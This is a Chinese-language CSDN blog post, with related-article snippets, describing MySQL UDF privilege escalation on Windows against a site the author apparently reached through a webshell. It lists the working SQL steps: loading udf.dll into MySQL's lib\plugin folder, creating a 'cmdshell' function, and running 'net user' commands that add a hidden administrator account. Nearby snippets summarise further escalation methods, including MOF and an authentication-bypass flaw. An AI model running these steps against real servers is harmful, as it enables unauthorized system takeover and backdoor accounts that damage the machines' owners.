mysql 5.5 udf_mysql5.1 udf提权

最新推荐文章于 2022-10-22 21:44:11 发布
最新推荐文章于 2022-10-22 21:44:11 发布
阅读量239 收藏
点赞数
文章标签: mysql 5.5 udf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39616003/article/details/113203180
版权

今儿遇见一个站,支持aspx,但是不定全满,找不到SA,逼迫使用udf提权,但是提权过程里面遇见了一些问题

可以导出

然后就去执行神马

create function cmdshell returns string soname 'c:\windows\udf.dll'

可是悲剧就来了

请检查SQL语句Create Function cmdshell returns string soname 'C:\\Windows\\udf.dll';的语法是否正确。No paths allowed for shared library

看提示是可以省略路径的

然后就去执行神马

create function cmdshell returns string soname 'udf.dll'

可是继续悲剧

数据库查讯出错,请检查SQL语句create function cmdshell returns string soname 'udf.dll'的语法是否正确。Can't open shared library 'udf.dll' (errno: 2 )然后去百度了下

从MYSQL 5.1版本开始必须要把udf.dll文件放到MYSQL安装目录下的lib\plugin文件夹下才能创建自定义函数,并且该目录默认是不存在的,这就 需要我们使用webshell找到MYSQL的安装目录,并在安装目录下创建lib\plugin文件夹,然后将udf.dll文件导出到该目录即可。找到目录,居然存在,填写进去,导入成功

来创建函数

create function cmdshell returns string soname 'udf.dll'

mysql是5.0以上的,我们把udf.dll导出到windows的目录下(c:\\windows\\udf.dll)  root权限,然后执行下面的sql命令

create function cmdshell returns string soname 'udf.dll'

select cmdshell('net user asp.net XX /add')

select cmdshell('net localgroup administrators asp.net /add');

select cmdshell('net user')

weixin_39616003
关注
mysql 5.1提权_MySQL 5.1.51更新修复多个拒绝服务和本地提权漏洞
weixin_29406875的博客
01-19 221
发布日期:2010-10-04更新日期:2010-10-04受影响系统:Oracle MySQL < 5.1.51不受影响系统:Oracle MySQL 5.1.51描述:--------------------------------------------------------------------------------MySQL是一款使用非常广泛的开放源代码关系数据库系统,拥有各...
mysql 5.5 udf_MYSQL5漏洞之udf提权
weixin_28702613的博客
01-19 366
一、适用条件1.目标系统是Windows(Win2000,XP,Win2003);2.你已经拥有MYSQL的某个用户账号,此账号必须有对mysql的insert和delete权限以创建和抛弃函数(MYSQL文档原语)。3.有root账号密码二、导出udfMYSQL 5.1以下版本导出路径:C:Winntudf.dll2000C:Windowsudf.dll 2003(有的系统被转义,需要改为C:...
暗月mysql全版本通杀提权
06-21
暗月mysql全版本通杀提权
mysql udf 提权
完美落地
12-06 859
mysqludf提权方法 01 May 2013 UDF(用户定义函数)是一类对MYSQL服务器功能进行扩充的代码,通常是用C(或C++)写的。通过添加新函数,性质就象使用本地MYSQL函数abs()或concat()。当你需要扩展MYSQL服务器功能时,UDF通常是最好的选择。但同时,UDF也是黑客们在拥有低权限mysql账号时比较好用的一种提权方法。 适用场合: 1、目标主机系...
Mysql udf提权
weixin_43689084的博客
12-11 1607
Mysql udf提权 操作系统信息和MySQL数据库信息共同决定了udf提权时dii文件导出的位置,通过获取目标服务器的操作系统信息和MySQL数据库版本信息为后续提取奠定基础。 1,获取目标操作系统信息,查看操作系统信息的方法有很多,如果能够执行命令的话,可以通过“systeminfo”命令来获取,如果不能执行命令的话,可以再nmap中通过"nmap target -O"来获取。 2,获取目标...
MySQL UDF 提权
最新发布
small_cat's home
10-22 1893
UDF 全称 User Defind Function(用户自定义函数),用户通过自定义函数可以实现在 MySQL 中无法方便实现的功能,其添加的新函数都可以在 SQL 语句中调用,就像调用本机函数 version () 一样方便。UDF 提权是通过这样的方法来实现获取对方主机的system的shell权限,从而达到提权的目的。要实现 UDF 提权需要有一个动态链接库文件。
linux下 udf提权_udf提权
weixin_34862561的博客
01-14 1032
0x00前言:udf提权是通过数据库来实现获取目标的管理员的shell,来达到从低权限提权到高权限0x01什么是udfudf(Userdefined function)是用户自定义函数在mysql中函数是什么,比如mysql中常见的sleep(),sum(),ascii()等都是函数udf就是为了让我们开发者能够自己写方便自己函数,它有3种返回值,这三种分别是STRING,INTEGER,REA...
MySQL提权总结(建议收藏)
xj28555的博客
09-08 740
原文地址:https://www.cnblogs.com/sfsec/p/15241860.html 前言 数据库权限 在平常的渗透提权中,我们通常可以在一些特殊情况下得到数据库的用户名和密码(最高权限root),如下: MySQL 3306 端口弱口令爆破 sqlmap 注入的 --sql-shell 模式 网站的数据库配置文件中拿到明文密码信息 CVE-2012-2122 等这类漏洞直接拿下 MySQL 权限 口令爆破、sqlmap的--sql-shell模式和数据库配置文件中拿明文密码已经
mysql5.5版本密钥_mysql5.5的安装与配置(亲测版)
weixin_39526459的博客
01-19 514
mysql5.5.x的编译安装说明:5.55.1差不多,只是在编译时增加了一个cmake,其他基本一样,mysql5.5默认编码是utf-8,在使用mysql5.5配置lnmp或者lamp后安装discuz,一定要选utf-8的编码不然会报错CentOS 6 mysql5.5安装配置1 安装所需软件2 安装cmake3 tar.gz形式安装mysql4 配置与启动5 rpm形式安装mysql6 ...
mysql_udf提权
qq_42383069的博客
03-05 3285
0x00. 环境配置: 安装phpstudy,并且以系统服务模式启动 创建普通用户 在服务中将Apache以普通账户启动 赋予apache目录下logs普通账户写入权限 连接大马,测试下当前我们的权限 0x01. UDF介绍与使用: 什么是udfudf(Userdefined function)是用户自定义函数。在mysql中函数是什么?比如mysql中常见的sleep(),sum(),ascii()等都是函数。而udf就是为了让我们开发者能够自己写方便自己函数 为了在mysql中使用此
MySQL udf提权
weixin_45945976的博客
12-02 959
MySQL udf提权 UDF提权这个利用还是不太常见的,因为在mysql5.1版本以后对注册的UDF的位置有了限制,而在默认的是没有\lib\plugin文件夹的,一般需要root用户修改。 什么是UDF UDF就是User Defined Function,用户自定义函数,即通过用户添加的函数来对MySQL的功能进行补偿 怎么使用UDF 我的mysql版本:5.7.26,所以我的是默认没有plugin这个目录的 查看secure_file_priv的指 secure_file_priv是用来限制load
MYSQL提权总结
weixin_30892889的博客
01-23 403
经擦遇到了MYSQL数据库,想尽办法提权,最终都没有成功,很是郁闷,可能是自己很久没有研究过提权导致的吧,总结一下MYSQL提权的各种姿势吧,权当复习了。关于mysql提权的方法也就那么几种,希望也能帮到各位小伙伴们。 一、利用mof提权 前段时间国外Kingcope大牛发布了mysql远程提权0day(MySQL Windows Remote System Level Exploit (S...
【数据库提权MySQL提权UDF提权
ssrf
10-24 1172
文章目录一、什么是UDF?二、什么是动态链接库?三、UDF提权原理 一、什么是UDFUDF(user-defined function)是MySQL的一个拓展接口,也可称之为用户自定义函数,它是用来拓展MySQL的技术手段,可以说是数据库功能的一种扩展,用户通过自定义函数来实现在MySQL中无法方便实现的功能,其添加的新函数都可以在SQL语句中调用,就像本机函数如ABS()或SOUNDEX()一样方便。 二、什么是动态链接库? DLL 是 Dynamic Link Library 的缩写,译为“动态
mysql udf 提权小结
weixin_30274627的博客
09-15 100
一、适用条件   1.目标系统是Windows(Win2000,XP,Win2003);   2.你已经拥有MYSQL的某个用户账号,此账号必须有对mysql的insert和delete权限以创建和抛弃函数(MYSQL文档原语)。   3.有root账号密码   二、导出udf   MYSQL 5.1以下版本导出路径:   C:\Winnt\udf.dll 2000   C:\Win...
mysql 5.5 udf提权_MySQL_UDF提权
weixin_31548723的博客
01-27 675
大三就快结束啦,也要轮到我找工作啦,结合网上的资料和自己的经验准备了一些材料,算是对自己技术方面的小小总结吧。趁这个机会查缺补漏做一些原来知道但没有动手试过的实验。一、原理udf 即 user defined function,文件后缀为.dll。通过在 udf 文件中定义新函数,可以对 mysql 的功能进行扩充,利用 mysql 账号 root 权限创建可以执行系统命令函数的 udf.dll ...
Windows下利用MySQL UDF提权
甲方乙方
08-13 3784
Windows下服务器提权之利用第三方服务MySQL 可利用环境: web应用服务器权限较低MySQLsystem 权限 假设已经拿到webshell。。。 1、了解上传的大马功能,查询一些关于目标服务器的系统信息 2、whoami查看当前权限 3、在网站web目录下上传UDF漏洞利用脚本,进行提权。上传成功,访问该文件:uid为root,pwd为空 4、mysql
MySQL UDF提权
小水池
08-08 9139
0x00 原理 udf = ‘user defined function‘,即‘用户自定义函数’。文件后缀为‘.dll’,常用c语言编写。 通过在udf文件中定义新函数,对MYSQL的功能进行扩充,可以执行系统任意命令。将MYSQL账号root转化为系统system权限。   0x01 思路   1. 将udf文件上传到指定位置  sqlmap中有现成的udf文件,分为32位和64位...
mysql udf提权_mysql数据库漏洞利用及提权方式小结
weixin_39971435的博客
12-05 696
转先知社区作者:ghtwf01CVE-2012-2122 Mysql身份认证漏洞影响版本Mysql5.5.24之前MariaDB也差不多这个版本之前漏洞原理只要知道用户名,不断尝试就能够直接登入SQL数据库,按照公告说法大约256次就能够蒙对一次漏洞复现msf利用hash解密得到密码即可登录python exp#!/usr/bin/pythonimport subprocesswhi...
Mysql_UDF提权
热门推荐
极客神殿
02-04 1万+
Root权限一、上传udf.dll小于mysql5.1版本 C:\WINDOWS\udf.dll 或 C:\WINDOWS\system32\udf.dll 等于mysql5.1版本 %mysql%\plugin\udf.dll 用 select @@plugin_dir 查询plugin路径 默认 C:\Program Files\MySQL\MySQL Server 5.
利用mysql_udf与curl实现HTTP_POST通信的C库示例
mysql_udfMySQL为C语言开发者提供的一种扩展机制,允许用户在MySQL服务器内部添加自定义函数,以便与外部服务进行交互。在这个示例中,主要关注的是利用curl库的异步HTTP请求功能,特别是curl_multi API,来进行...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值